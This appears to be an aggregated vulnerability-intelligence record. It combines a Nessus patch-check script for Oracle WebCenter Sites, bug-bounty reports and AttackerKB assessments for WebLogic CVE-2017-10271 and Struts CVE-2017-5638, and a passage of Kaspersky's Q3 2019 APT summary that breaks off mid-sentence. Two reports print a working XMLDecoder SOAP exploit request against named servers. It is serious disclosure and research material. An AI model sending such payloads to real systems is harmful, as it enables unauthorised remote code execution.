script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_webcenter_sites_installed.nbin\");\n script_require_keys(\"SMB/WebCenter_Sites/Installed\");\n\n exit(0);\n}\n\nport = get_kb_item('SMB/transport');\nif (isnull(port))\n port = 445;\n\nget_kb_item_or_exit('SMB/WebCenter_Sites/Installed');\n\nversions = get_kb_list('SMB/WebCenter_Sites/*/Version');\nif (isnull(versions)) exit(1, 'Unable to obtain a version list for Oracle WebCenter Sites.');\n\nreport = '';\n\nforeach key (keys(versions))\n{\n fix = '';\n\n version = versions[key];\n revision = get_kb_item(key - '/Version' + '/Revision');\n path = get_kb_item(key - '/Version' + '/Path');\n\n if (isnull(version) || isnull(revision)) continue;\n\n # Patch 25883419 - 11.1.1.8.0 < Revision 184000 \n if (version =~ \"^11\\.1\\.1\\.8\\.0$\" && revision < 184000)\n {\n fix = '\\n Fixed revision : 184000' +\n '\\n Required patch : 25883419';\n }\n # Patch 25806935 - 12.2.1.0.0 < Revision 184040 \n else if (version =~ \"^12\\.2\\.1\\.0\\.0$\" && revision < 184040)\n {\n fix = '\\n Fixed revision : 184040' +\n '\\n Required patch : 25806935';\n }\n # Patch 25806943 - 12.2.1.1.0 < Revision 184025 \n else if (version =~ \"^12\\.2\\.1\\.1\\.0$\" && revision < 184025)\n {\n fix = '\\n Fixed revision : 184025' +\n '\\n Required patch : 25806943';\n }\n # Patch 25806946 - 12.2.1.2.0 < Revision 184026 \n else if (version =~ \"^12\\.2\\.1\\.2\\.0$\" && revision < 184026)\n {\n fix = '\\n Fixed revision : 184026' +\n '\\n Required patch : 25806946';\n }\n\n if (fix != '')\n {\n if (!isnull(path)) report += '\\n Path : ' + path;\n report += '\\n Version : ' + version +\n '\\n Revision : ' + revision +\n fix + '\\n';\n }\n}\n\nif (report != '') security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\nelse 
audit(AUDIT_INST_VER_NOT_VULN, \"Oracle WebCenter Sites\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-09-03T14:04:45", "bounty": 0.0, "description": "##Summary\n\nHello. I was able to identify RCE vulnerability due to the outdated Oracle Weblogic instance on `https://raebilling.mtn.co.za`.\n\n##Steps To Reproduce\n\n* To reproduce, launch this request with BurpSuite\n* This request to the `https://raebilling.mtn.co.za/wls-wsat/CoordinatorPortType` will trigger sleep for 15 seconds (same applies for 20 seconds, 40 seconds):\n\n```\nPOST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1\nHost: raebilling.mtn.co.za\nContent-Length: 426\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>40000</long>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\n==**POC:**== {F736913} {F736912} {F736915}\n\n## Suggested Mitigation/Remediation Actions\n* Patching WebLogic to the recent version will fix the issue.\n\n## Impact\n\n**This vulnerability allows an unauthenticated attacker:**\n* To perform Remote OS Command Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-03-04T13:45:59", "type": "hackerone", "title": "MTN Group: Remote OS Command Execution on Oracle Weblogic server via 
[CVE-2017-10271]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2021-04-25T12:39:51", "id": "H1:810755", "href": "https://hackerone.com/reports/810755", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-09-03T20:38:54", "bounty": 0.0, "description": "**Summary:**\nHappy Friday! The server at `\u2588\u2588\u2588\u2588\u2588\u2588` is vulnerable to CVE-2017-10271 \"Oracle WebLogic Server Remote Command Execution\".\n\n**Description:**\nThe following request takes 12 seconds (12000 milliseconds) to complete:\n```\nPOST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nContent-Length: 423\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>12000</long>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\nThis proves that I have Java code execution on the remote server. 
\n\nref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/\n\nPublic exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271\nI was not able to use that script with a `ping` command, which might have been blocked by preventing outbound connections.\n\n## Suggested Mitigation/Remediation Actions\nPatch & possibly don't allow external access.\n\n## Impact\n\nCritical, RCE.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-10T22:23:31", "type": "hackerone", "title": "U.S. Dept Of Defense: RCE on \u2588\u2588\u2588\u2588\u2588 via CVE-2017-10271", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-07-01T19:54:20", "id": "H1:576887", "href": "https://hackerone.com/reports/576887", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-07-06T16:00:44", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. 
@0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T13:22:29", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-05-31T21:36:13", "id": "H1:213069", "href": "https://hackerone.com/reports/213069", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-01T00:57:28", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. Thank you @n0rb3r7 for notifying us of this vulnerability!\nI was able to leverage a recent, well-known vulnerability to achieve arbitrary, remote command execution on a U.S. 
Department Of Defense server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T04:14:12", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote code execution vulnerability on a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-07-03T18:23:05", "id": "H1:212985", "href": "https://hackerone.com/reports/212985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-01T01:06:10", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. 
Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-09T17:59:08", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-01T14:48:16", "id": "H1:212022", "href": "https://hackerone.com/reports/212022", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-09-30T03:24:10", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). 
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\n\n \n**Recent assessments:** \n \n**wchen-r7** at May 23, 2019 5:44pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\n**asoto-r7** at September 12, 2019 6:06pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T00:00:00", "type": "attackerkb", "title": "CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2021-07-27T00:00:00", "id": "AKB:7992242A-E0F4-4572-BE13-859467611F09", "href": "https://attackerkb.com/topics/KjHcjsGuez/cve-2017-10271---oracle-weblogic-server-asyncresponseservice-deserialization-vulnerability", "cvss": {"score": 
5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-23T17:24:09", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:29pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\n**hrbrmstr** at May 12, 2020 7:45pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2020-07-30T00:00:00", "id": "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "href": "https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T17:28:07", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. 
No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2020-11-17T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2019-10-16T11:39:54", "description": "\n\nFor more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. 
They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## **The most remarkable findings**\n\nOn August 30, Ian Beer from Google's Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or if they are still active, it claims that these websites receive \"thousands of visitors per week\". The first stage Webkit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contain many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, show a high level of resources and dedication. Upon infection, the malware itself will be invisible to the victim. 
It pings its C2 every 60 seconds for new commands. It is able to get access to all kinds of files in the system, as well as tracking GPS position. There is no mechanism to survive a reboot, but the capability to steal signing-in cookies from a victim's account can keep providing the attackers with access to this data.\n\nShortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a \"strategic web compromise targeting Uyghurs\". Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.\n\nAt the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium [has also reduced payouts](<https://threatpost.com/android-zero-days-worth-more-iphone-exploits/147981/>) for Apple one-click exploits. On the same day, a high-severity zero-day was found in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, [was not included](<https://threatpost.com/android-zero-day-bug-opens-door-to-privilege-escalation-attack-researchers-warn/148014/>) in Google's September security update. 
A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to [gain full access](<https://www.independent.co.uk/life-style/gadgets-and-tech/news/android-security-flaw-hack-samsung-huawei-phone-text-message-sms-a9093111.html>) to emails on a compromised device using an SMS message.\n\n## **Russian-speaking activity**\n\nTurla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a .NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.\n\nTurla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new .NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. Two KopiLuwak analogues \u2013 the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. 
All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.\n\nIn September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\n## **Chinese-speaking activity**\n\nHoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts, .NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over HTTP for lateral movement; (d) various system and network utilities. 
Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in Bangladesh, it's possible that the individual targets were related to geopolitical activity in the region.\n\nSince the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn't changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim's network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.\n\nOur January 2018 private report 'ShaggyPanther \u2013 Chinese-speaking cluster of activity in APAC' introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then, ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. 
The newer 2018 and 2019 backdoor code adds a new layer of obfuscation and no longer contains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.\n\n## **Middle East**\n\nOn August 1, Dragos published an overview of attacks called 'Oil and Gas Threat Perspective Summary', which references an alleged new threat actor they call Hexane. According to the report, \"HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia\". Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group's emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane's activity appears to have started around September 2018 with a second wave of activity starting in May 2019. 
In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.\n\nTortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec's report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report during a national holiday period in Saudi Arabia. 
However, we didn't find any compromised application that could suggest a supply chain attack.\n\n## **Southeast Asia and the Korean Peninsula**\n\nRecently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don't steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker's server, giving us a chance to investigate it.\n\nWe recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential 